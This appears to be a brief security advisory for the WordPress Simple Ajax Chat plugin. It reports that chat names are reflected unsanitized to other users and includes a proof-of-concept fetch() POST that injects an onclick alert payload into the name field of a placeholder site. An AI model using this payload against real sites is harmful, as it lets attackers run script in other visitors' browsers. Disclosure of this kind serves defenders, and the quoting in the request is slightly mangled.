Description The plugin does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users.
await fetch(“http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes”, { “credentials”: “include”, “headers”: { “User-Agent”: “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0”, “Accept”: “/”, “Accept-Language”: “en-CA,en-US;q=0.7,en;q=0.3”, “Content-Type”: “application/x-www-form-urlencoded”, “Sec-GPC”: “1” }, “body”: “n=%22onclick=%22alert1
%22&c;=adasd&u;=https%3A%2F%2F&sac;_nonce=$NONCE&sac;_js_nonce=$NONCE”, “method”: “POST”, “mode”: “cors” });